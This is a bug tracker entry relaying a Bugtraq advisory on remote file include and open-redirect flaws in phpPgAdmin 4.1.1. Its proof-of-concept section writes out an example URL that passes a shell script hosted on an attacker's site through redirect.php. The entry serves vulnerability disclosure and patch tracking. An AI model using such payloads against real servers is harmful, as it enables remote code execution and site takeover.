Bug 180516

Description Sune Kloppenborg Jeppesen (RETIRED) 2007-06-01 06:16:12 UTC

Another issue was reported on Bugtraq.

Xmor$ Security Vulnerability Research TM
 
 # Tilte: phpPgAdmin-4.1.1 Remote File Include & Url Redirecting Vulnerabilitiy
 
 # Author..................: [the_Edit0r]
 # HomePage ...............: [Www.XmorS-sEcurity.coM]
 [Www.XmorS.coM] [Www.XmorS.neT]
 # Location ...............: [Iran]
 # Software ...............: [phpPgAdmin] 
 # Impact..................: [ Remote & url Redirecting ]
 # Site Script ............: [http://phppgadmin.sourceforge.net]
 # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]
 # SP tnx .................: [www.bugtraq.ir] & [Iranian Hackers TeaM]
 
 ------------------------------- proof Of Concept ---------------------------
 
 www.example.com/[path]/redirect.php?url=[Shell-Script] & [ Url Redirecting ]
 
 Ex:
 
 1-Shell----> http://Sitename/[path]/redirect.php?url=http://www.attacker.com/shell.tx
 t
 
 2-url Redirecting ------> http://sitename/[path]/redirect.php?url=http://www.Google.coM
 
 ------------------------------------------------------------------------
 ----
 
 # Contact me : the_3dit0r[at]Yahoo[dot]coM
 
 # [XmorS-SEcurity.coM]